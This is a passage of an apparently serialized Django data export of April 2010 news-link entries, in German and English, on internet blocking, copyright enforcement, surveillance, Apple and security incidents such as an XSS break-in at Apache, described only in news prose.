Auch das Thema Kinderpornographie im Internet war Thema im Videochat von tagesschau.de. Der Bundesinnenminister stellte klar, das es bei der Sperrung und Löschung von Bildern kein “entweder oder” geben solle. “Das Löschen der Seiten ist keine Lösung sondern nur temporäres Verbannen von der Seite”. Ob es ihm vorrangig um die Sperrung pornographischer Bilder oder um die Netzfreiheit gehen würde, entgegnete der Minister: “So scharf stellt sich die Alternative in der Regel nicht. Deswegen glaube ich das es einen Weg gibt, Kinderpornografie zu bekämpfen ohne die Freiheit des Internets aufzugeben.”
&lt;hr /&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="http://ccc.de/de/updates/2010/offener-brief-leuti-schnarri"&gt;Offener Brief&lt;/a&gt; dagegen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/innenminister-stellt-loeschen-statt-sperren-in-frage/</field><field type="FileField" name="page_screenshot">page_shots/2010/04/20/innenminister-stellt-8220loschen-statt-sperre__.png</field><field type="SlugField" name="slug">innenminister-stellt-8220loschen-statt-sperre</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-20 09:41:59</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">internetsperren</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="105" model="submitter.newsentry"><field type="CharField" name="title"> Hitler Is Very Upset That Constantin Film Is Taking Down Hitler Parodies </field><field type="TextField" name="excerpt">Constantin Film mahnt "Der Untergang" Parodien ab.
Constantin Film is the German film production and distribution company behind the film Downfall (Der Untergang in German). The uploader of one of the Hilter parodies notes in the comments of his video that, “Constatin Films has filed a copyright infringement claim against this video, right before it was about to reach 500,000 views! Even though it falls? under Fair Use, I suspect this video will be taken down soon. Sad face.“
Read more: http://techcrunch.com/2010/04/19/hitler-parody-takedown/#ixzz0lcfUw0Up</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Constantin Film mahnt "Der Untergang" Parodien ab.
Constantin Film is the German film production and distribution company behind the film Downfall (Der Untergang in German). The uploader of one of the Hilter parodies notes in the comments of his video that, “Constatin Films has filed a copyright infringement claim against this video, right before it was about to reach 500,000 views! Even though it falls? under Fair Use, I suspect this video will be taken down soon. Sad face.“
&lt;/p&gt;
&lt;p&gt;Read more: http://techcrunch.com/2010/04/19/hitler-parody-takedown/#ixzz0lcfUw0Up
&lt;/p&gt;</field><field type="CharField" name="external_url">http://techcrunch.com/2010/04/19/hitler-parody-takedown/</field><field type="FileField" name="page_screenshot">page_shots/2010/04/20/hitler-is-very-upset-that-constantin-film-is-tak.png</field><field type="SlugField" name="slug">hitler-is-very-upset-that-constantin-film-is-tak</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-20 09:21:54</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">constantin parody</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="104" model="submitter.newsentry"><field type="CharField" name="title">This Is Apple's Next iPhone - Iphone 4 - Gizmodo</field><field type="TextField" name="excerpt">Riecht ganz stark nach einem **Marketing-PR-Ding**.
Awesome! Nächste iPhone-Version in Bar verloren.
Grund war [Deutsches Bier](http://gizmodo.com/5520438/how-apple-lost-the-next-iphone)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Riecht ganz stark nach einem &lt;strong&gt;Marketing-PR-Ding&lt;/strong&gt;.
Awesome! Nächste iPhone-Version in Bar verloren.
Grund war &lt;a href="http://gizmodo.com/5520438/how-apple-lost-the-next-iphone"&gt;Deutsches Bier&lt;/a&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://gizmodo.com/5520164/this-is-apples-next-iphone</field><field type="FileField" name="page_screenshot">page_shots/2010/04/20/this-is-apples-next-iphone-iphone-4-gizmodo___.png</field><field type="SlugField" name="slug">this-is-apples-next-iphone-iphone-4-gizmodo</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-19 23:42:44</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">apple iphone marketing</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="103" model="submitter.newsentry"><field type="CharField" name="title">Palm Pwned: Researchers Hack WebOS With Text Messages | threatpost</field><field type="TextField" name="excerpt">Das WebOS mittels SMS geowned. History repeats itself.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Das WebOS mittels SMS geowned. History repeats itself.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://threatpost.com/en_us/blogs/palm-pwned-researchers-hack-webos-text-messages-041910</field><field type="FileField" name="page_screenshot">page_shots/2010/04/19/palm-pwned-researchers-hack-webos-with-text-messa.png</field><field type="SlugField" name="slug">palm-pwned-researchers-hack-webos-with-text-messa</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-19 23:36:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">palm sms webos</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="102" model="submitter.newsentry"><field type="CharField" name="title"> How Dirty MP3 Files Are A Back Door Into Cloud DRM </field><field type="TextField" name="excerpt">Songs sollen per digitalem Wasserzeichen und Online-Streaming kontrolliert werden
Während sich Online-Stores und Musik-Labels die vergangenen Jahre schrittweise darauf geeinigt haben, im Internet vertriebene Download-Songs ohne Kopierschutz auszuliefern, um Kundenwünschen entgegen zu kommen, scheint die Musikindustrie künftig wieder mehr Kontrolle über ihre Werke haben zu wollen.
Online-DRM
siehe auch der [standard] (http://derstandard.at/1269449159003/Bericht-Musikindustrie-plant-Comeback-des-Kopierschutzes)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Songs sollen per digitalem Wasserzeichen und Online-Streaming kontrolliert werden
&lt;/p&gt;
&lt;p&gt;Während sich Online-Stores und Musik-Labels die vergangenen Jahre schrittweise darauf geeinigt haben, im Internet vertriebene Download-Songs ohne Kopierschutz auszuliefern, um Kundenwünschen entgegen zu kommen, scheint die Musikindustrie künftig wieder mehr Kontrolle über ihre Werke haben zu wollen.
&lt;/p&gt;
&lt;p&gt;Online-DRM
&lt;/p&gt;
&lt;p&gt;siehe auch der &lt;a href="http://derstandard.at/1269449159003/Bericht-Musikindustrie-plant-Comeback-des-Kopierschutzes"&gt;standard&lt;/a&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://techcrunch.com/2010/04/06/how-dirty-mp3-files-are-a-back-door-into-cloud-drm/</field><field type="FileField" name="page_screenshot">page_shots/2010/04/18/how-8220dirty8221-mp3-files-are-a-back-doo_.png</field><field type="SlugField" name="slug">how-8220dirty8221-mp3-files-are-a-back-doo</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-18 12:13:57</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">cloud drm</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="101" model="submitter.newsentry"><field type="CharField" name="title">Feds drop bid for warrantless access to Yahoo! mail • The Register</field><field type="TextField" name="excerpt">The federal government has dropped its controversial bid to read messages in a Yahoo! email account without getting a search warrant.
"While this is a great victory for that Yahoo! subscriber, it's disappointing to those of us who wanted a clear ruling on the legality and constitutionality of the government's overreaching demand," wrote Kevin Bankston, an attorney with the Electronic Frontier Foundation, part of a coalition of groups that opposed the government's action. "Such demands are apparently a routine law enforcement technique."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The federal government has dropped its controversial bid to read messages in a Yahoo! email account without getting a search warrant.
&lt;/p&gt;
&lt;p&gt;"While this is a great victory for that Yahoo! subscriber, it's disappointing to those of us who wanted a clear ruling on the legality and constitutionality of the government's overreaching demand," wrote Kevin Bankston, an attorney with the Electronic Frontier Foundation, part of a coalition of groups that opposed the government's action. "Such demands are apparently a routine law enforcement technique."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/04/17/yahoo_warrantless_email_search_dropped/</field><field type="FileField" name="page_screenshot">page_shots/2010/04/17/feds-drop-bid-for-warrantless-access-to-yahoo-mai.png</field><field type="SlugField" name="slug">feds-drop-bid-for-warrantless-access-to-yahoo-mai</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-17 11:11:44</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">eff yahoo</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="100" model="submitter.newsentry"><field type="CharField" name="title">Bushs Illegal Wiretapping Tab: $612,000</field><field type="TextField" name="excerpt">The two American lawyers who were illegally wiretapped by the Bush administration asked a federal judge Friday to order the government to pay $612,000 in damages, plus legal fees for their attorneys.
Under Bushs so-called Terrorist Surveillance Program, which The New York Times disclosed in December 2005, the NSA was eavesdropping on Americans telephone calls without warrants if the government believed the person on the other line was overseas and associated with terrorism. Congress, with the vote of Barack Obama — who was a U.S. senator from Illinois at the time — subsequently authorized such warrantless spying in the summer of 2008.</field><field type="TextField" name="body">The government in 2004 was intercepting the telephone communications of lawyers Wendell Belew and Asim Ghafoor. They were counsel to a Saudi charity, the Al-Haramain Islamic Foundation, which the gov
Read More http://www.wired.com/threatlevel/2010/04/wiretaptab/#ixzz0lLWlrTFT
Read More http://www.wired.com/threatlevel/2010/04/wiretaptab/#ixzz0lLWly5Tg
</field><field type="TextField" name="body_html">&lt;p&gt;The government in 2004 was intercepting the telephone communications of lawyers Wendell Belew and Asim Ghafoor. They were counsel to a Saudi charity, the Al-Haramain Islamic Foundation, which the gov
&lt;/p&gt;
&lt;p&gt;Read More http://www.wired.com/threatlevel/2010/04/wiretaptab/#ixzz0lLWlrTFT
&lt;/p&gt;
&lt;p&gt;Read More http://www.wired.com/threatlevel/2010/04/wiretaptab/#ixzz0lLWly5Tg
&lt;/p&gt;</field><field type="TextField" name="excerpt_html">&lt;p&gt;The two American lawyers who were illegally wiretapped by the Bush administration asked a federal judge Friday to order the government to pay $612,000 in damages, plus legal fees for their attorneys.
&lt;/p&gt;
&lt;p&gt;Under Bushs so-called Terrorist Surveillance Program, which The New York Times disclosed in December 2005, the NSA was eavesdropping on Americans telephone calls without warrants if the government believed the person on the other line was overseas and associated with terrorism. Congress, with the vote of Barack Obama — who was a U.S. senator from Illinois at the time — subsequently authorized such warrantless spying in the summer of 2008.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.wired.com/threatlevel/2010/04/wiretaptab/#ixzz0lLWly5Tg</field><field type="FileField" name="page_screenshot">page_shots/2010/04/17/600usd-damages-fee.png</field><field type="SlugField" name="slug">600usd-damages-fee</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-17 10:49:04</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">nsa wiretap</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="99" model="submitter.newsentry"><field type="CharField" name="title">heise resale - Urheberrechtsabgabe für USB-Sticks und Speicherkarten festgezurrt</field><field type="TextField" name="excerpt">Auf eine Urheberrechtsabgabe in Höhe von 10 Cent je USB-Stick und Speicherkarte hatten sich der Informationskreis AufnahmeMedien (IM) der rund 20 Hersteller und Importeure vertritt und die Verwertungsgesellschaften schon im Mai vergangenen Jahres geeinigt. Zur Vertragsunterzeichnung kam es jedoch erst zum Jahreswechsel. Nach Einschätzung des IM zögerte die Zentralstelle für private Überspielrechte (ZPÜ) den Abschluss hinaus, um eine gesamtvertragliche Einigung auch in der Streitsache PC-Abgabe anzustreben.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Auf eine Urheberrechtsabgabe in Höhe von 10 Cent je USB-Stick und Speicherkarte hatten sich der Informationskreis AufnahmeMedien (IM) der rund 20 Hersteller und Importeure vertritt und die Verwertungsgesellschaften schon im Mai vergangenen Jahres geeinigt. Zur Vertragsunterzeichnung kam es jedoch erst zum Jahreswechsel. Nach Einschätzung des IM zögerte die Zentralstelle für private Überspielrechte (ZPÜ) den Abschluss hinaus, um eine gesamtvertragliche Einigung auch in der Streitsache PC-Abgabe anzustreben.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/resale/meldung/Urheberrechtsabgabe-fuer-USB-Sticks-und-Speicherkarten-festgezurrt-979708.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/16/heise-resale-urheberrechtsabgabe-fur-usb-sticks.png</field><field type="SlugField" name="slug">heise-resale-urheberrechtsabgabe-fur-usb-sticks</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-16 23:46:22</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">urheberrechtsabgabe</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object><object pk="7"></object></field></object><object pk="98" model="submitter.newsentry"><field type="CharField" name="title">Nestle-killer-kampagne</field><field type="TextField" name="excerpt">Nestle über Twitter, Facebook etc. für Einsatz von Palmöl zur Sau gemacht.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Nestle über Twitter, Facebook etc. für Einsatz von Palmöl zur Sau gemacht.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.spiegel.de/netzwelt/web/0,1518,688975,00.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/16/nestle-killer-kampagne.png</field><field type="SlugField" name="slug">nestle-killer-kampagne</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-16 23:37:39</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">facebook greenpeace nestle socialnet twitter</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="97" model="submitter.newsentry"><field type="CharField" name="title">Video-game shoppers surrender their immortal souls</field><field type="TextField" name="excerpt">By placing an order via this Web site on the first day of the fourth month of the year 2010 Anno Domini, you agree to grant Us a non transferable option to claim, for now and for ever more, your immortal soul. Should We wish to exercise this option, you agree to surrender your immortal soul, and any claim you may have on it, within 5 (five) working days of receiving written notification from gamesation.co.uk or one of its duly authorised minions....we reserve the right to serve such notice in 6 (six) foot high letters of fire, however we can accept no liability for any loss or damage caused by such an act. If you a) do not believe you have an immortal soul, b) have already given it to another party, or c) do not wish to grant Us such a license, please click the link below to nullify this sub-clause and proceed with your transaction.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;By placing an order via this Web site on the first day of the fourth month of the year 2010 Anno Domini, you agree to grant Us a non transferable option to claim, for now and for ever more, your immortal soul. Should We wish to exercise this option, you agree to surrender your immortal soul, and any claim you may have on it, within 5 (five) working days of receiving written notification from gamesation.co.uk or one of its duly authorised minions....we reserve the right to serve such notice in 6 (six) foot high letters of fire, however we can accept no liability for any loss or damage caused by such an act. If you a) do not believe you have an immortal soul, b) have already given it to another party, or c) do not wish to grant Us such a license, please click the link below to nullify this sub-clause and proceed with your transaction.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://newslite.tv/2010/04/06/7500-shoppers-unknowingly-sold.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/16/no_page_shot.png</field><field type="SlugField" name="slug">video-game-shoppers-surrender-their-immortal-souls</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-16 14:14:58</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">april, click, fool. prank, game, license, soul</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="96" model="submitter.newsentry"><field type="CharField" name="title">Big Content's dystopian wish-list for the US gov't: spyware, censorship, physical searches and SWAT teams</field><field type="TextField" name="excerpt"> The MPAA and RIAA have submitted their master plan for enforcing copyright to the new Office of Intellectual Property Enforcement. As the Electronic Frontier Foundation's Richard Esguerra points out, it's a startlingly distopian work of science fiction. The entertainment industry calls for:
* spyware on your computer that detects and deletes infringing materials;
* mandatory censorware on all Internet connections to interdict transfers of infringing material;
* border searches of personal media players, laptops and thumb-drives;
* international bullying to force other countries to implement the same policies;
* and free copyright enforcement provided by Fed cops and agencies (including the Department of Homeland Security!). </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt; The MPAA and RIAA have submitted their master plan for enforcing copyright to the new Office of Intellectual Property Enforcement. As the Electronic Frontier Foundation's Richard Esguerra points out, it's a startlingly distopian work of science fiction. The entertainment industry calls for:
&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;* spyware on your computer that detects and deletes infringing materials;
* mandatory censorware on all Internet connections to interdict transfers of infringing material;
* border searches of personal media players, laptops and thumb-drives;
* international bullying to force other countries to implement the same policies;
* and free copyright enforcement provided by Fed cops and agencies (including the Department of Homeland Security!).
&lt;/code&gt;&lt;/pre&gt;</field><field type="CharField" name="external_url">http://www.eff.org/deeplinks/2010/04/entertainment-industrys-dystopia-future</field><field type="FileField" name="page_screenshot">page_shots/2010/04/16/big-contents-dystopian-wish-list-for-the-us-govt.png</field><field type="SlugField" name="slug">big-contents-dystopian-wish-list-for-the-us-govt</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-16 14:02:58</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">contentmafia, copyfight, copyright, eff, filesharing, law enforcement, mpaa, politics, riaa</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="95" model="submitter.newsentry"><field type="CharField" name="title">Mark Fiore can win a Pulitzer Prize, but he can&amp;#8217;t get his iPhone cartoon app past Apple&amp;#8217;s satire police » Nieman Journalism Lab</field><field type="TextField" name="excerpt">Cartoonist Mark Fiore made Internet and journalism history as the first online-only journalist to win a Pulitzer Prize. Fiore took home the editorial cartooning prize for animations he created for SFGate, the website for the San Francisco Chronicle.
In December, Apple rejected his iPhone app, NewsToons, because, as Apple put it, his satire “ridicules public figures,” a violation of the iPhone Developer Program License Agreement, which bars any apps whose content in “Apples reasonable judgement may be found objectionable, for example, materials that may be considered obscene, pornographic, or defamatory.”</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Cartoonist Mark Fiore made Internet and journalism history as the first online-only journalist to win a Pulitzer Prize. Fiore took home the editorial cartooning prize for animations he created for SFGate, the website for the San Francisco Chronicle.
In December, Apple rejected his iPhone app, NewsToons, because, as Apple put it, his satire “ridicules public figures,” a violation of the iPhone Developer Program License Agreement, which bars any apps whose content in “Apples reasonable judgement may be found objectionable, for example, materials that may be considered obscene, pornographic, or defamatory.”
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.niemanlab.org/2010/04/mark-fiore-can-win-a-pulitzer-prize-but-he-cant-get-his-iphone-cartoon-app-past-apples-satire-police/</field><field type="FileField" name="page_screenshot">page_shots/2010/04/16/mark-fiore-can-win-a-pulitzer-prize-but-he-can8.png</field><field type="SlugField" name="slug">mark-fiore-can-win-a-pulitzer-prize-but-he-can8</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-16 11:25:59</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">apple appstore jounalism</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="7"></object></field></object><object pk="94" model="submitter.newsentry"><field type="CharField" name="title">Labor group: Chinese teens 'like prisoners' in Microsoft tech factory</field><field type="TextField" name="excerpt">The National Labor Committee offers an in-depth look into working conditions in Chinese sweatshops producing hardware (mice, etc.) for Microsoft ... Hewlett-Packard, Samsung, Foxconn, Acer, Logitech and Asus also outsource production to KYE Systems.
Apparently, so called 'work study students,' 16 and 17 years of age, work 15-hour shifts, six and seven days a week, for around 65 cents per hour.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The National Labor Committee offers an in-depth look into working conditions in Chinese sweatshops producing hardware (mice, etc.) for Microsoft ... Hewlett-Packard, Samsung, Foxconn, Acer, Logitech and Asus also outsource production to KYE Systems.
&lt;/p&gt;
&lt;p&gt;Apparently, so called 'work study students,' 16 and 17 years of age, work 15-hour shifts, six and seven days a week, for around 65 cents per hour.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://blog.seattlepi.com/microsoft/archives/201685.asp</field><field type="FileField" name="page_screenshot">page_shots/2010/04/15/labor-group-chinese-teens-like-prisoners-in-mic.png</field><field type="SlugField" name="slug">labor-group-chinese-teens-like-prisoners-in-mic</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-15 16:33:53</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">china</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="93" model="submitter.newsentry"><field type="CharField" name="title">heise online - Facebook: Lieber Angreifer jagen als Sicherheitslücken schließen </field><field type="TextField" name="excerpt">Facebooks Sicherheitschef Max Kelly verdiente einst seine Brötchen als Computer-Forensiker beim amerikanischen FBI.
Kelly gab bei Facebook die Devise aus, dass das Sammeln von Informationen über Attacken und die dahinter stehenden Kriminellen wichtiger ist als das Stopfen sämtlicher Lücken.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Facebooks Sicherheitschef Max Kelly verdiente einst seine Brötchen als Computer-Forensiker beim amerikanischen FBI.
&lt;/p&gt;
&lt;p&gt;Kelly gab bei Facebook die Devise aus, dass das Sammeln von Informationen über Attacken und die dahinter stehenden Kriminellen wichtiger ist als das Stopfen sämtlicher Lücken.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Facebook-Lieber-Angreifer-jagen-als-Sicherheitsluecken-schliessen-978224.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/15/heise-online-facebook-lieber-angreifer-jagen-al.png</field><field type="SlugField" name="slug">heise-online-facebook-lieber-angreifer-jagen-al</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-15 15:26:10</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">facebook fbi</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="92" model="submitter.newsentry"><field type="CharField" name="title">Palm Pre als mobiler WLAN-Access-Point</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Palm-Pre-als-mobiler-WLAN-Access-Point-972399.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/14/palm-pre-als-mobiler-wlan-access-point.png</field><field type="SlugField" name="slug">palm-pre-als-mobiler-wlan-access-point</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-14 00:23:09</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="91" model="submitter.newsentry"><field type="CharField" name="title">Apache Foundation Hit by Targeted XSS Attack | threatpost</field><field type="TextField" name="excerpt">Combining a cross-site scripting (XSS) vulnerability with a TinyURL redirect, hackers successfully broke into the infrastructure for the open-source Apache Foundation in what is being described as a "direct, targeted attack."
The hackers hit the server hosting the software that Apache.org uses to it to track issues and requests and stole passwords from all users. The software was hosted on brutus.apache.org, a machine running Ubuntu Linux 8.04 LTS, the group said.
The passwords were encrypted on the compromised servers (SHA-512 hash) but Apache said the risk to simple passwords based on dictionary words "is quite high" and urged users to immediately rotate their passwords. "In addition, if you logged into the Apache JIRA instance between April 6th and April 9th, you should consider the password as compromised, because the attackers changed the login form to log them," Apache said.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Combining a cross-site scripting (XSS) vulnerability with a TinyURL redirect, hackers successfully broke into the infrastructure for the open-source Apache Foundation in what is being described as a "direct, targeted attack."
&lt;/p&gt;
&lt;p&gt;The hackers hit the server hosting the software that Apache.org uses to it to track issues and requests and stole passwords from all users. The software was hosted on brutus.apache.org, a machine running Ubuntu Linux 8.04 LTS, the group said.
&lt;/p&gt;
&lt;p&gt;The passwords were encrypted on the compromised servers (SHA-512 hash) but Apache said the risk to simple passwords based on dictionary words "is quite high" and urged users to immediately rotate their passwords. "In addition, if you logged into the Apache JIRA instance between April 6th and April 9th, you should consider the password as compromised, because the attackers changed the login form to log them," Apache said.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://threatpost.com/en_us/blogs/apache-foundation-hit-targeted-xss-attack-041310?utm_source=Personalities+Pod&amp;utm_medium=Home+Page+Personalities&amp;utm_campaign=Personalities+Ryan</field><field type="FileField" name="page_screenshot">page_shots/2010/04/13/apache-foundation-hit-by-targeted-xss-attack-thr.png</field><field type="SlugField" name="slug">apache-foundation-hit-by-targeted-xss-attack-thr</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-13 19:08:44</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">apache hack tinyurl xss</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="90" model="submitter.newsentry"><field type="CharField" name="title">We Pad even runs Windows</field><field type="TextField" name="excerpt">"The WePad prototype they have shown at the press conference ran an ordinary Windows!", schrieb bereits am Montag kurz nach der Vorstellung das Blog androidpads.com. Der Beweis: Bei der Vorstellung des Geräts poppte unverhofft eine Windows-Fehlermeldung auf, wie ein Screenshot von einem Video der Vorstellung beweist. Ein weiteres Video bei Youtube zeigt, wie Neofonie-Chef Hoffer von Ankershoffen den angeblichen Prototypen offenbar peinlich berührt versteckt, als die Fehlermeldung auf dem Schirm erscheint.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;"The WePad prototype they have shown at the press conference ran an ordinary Windows!", schrieb bereits am Montag kurz nach der Vorstellung das Blog androidpads.com. Der Beweis: Bei der Vorstellung des Geräts poppte unverhofft eine Windows-Fehlermeldung auf, wie ein Screenshot von einem Video der Vorstellung beweist. Ein weiteres Video bei Youtube zeigt, wie Neofonie-Chef Hoffer von Ankershoffen den angeblichen Prototypen offenbar peinlich berührt versteckt, als die Fehlermeldung auf dem Schirm erscheint.
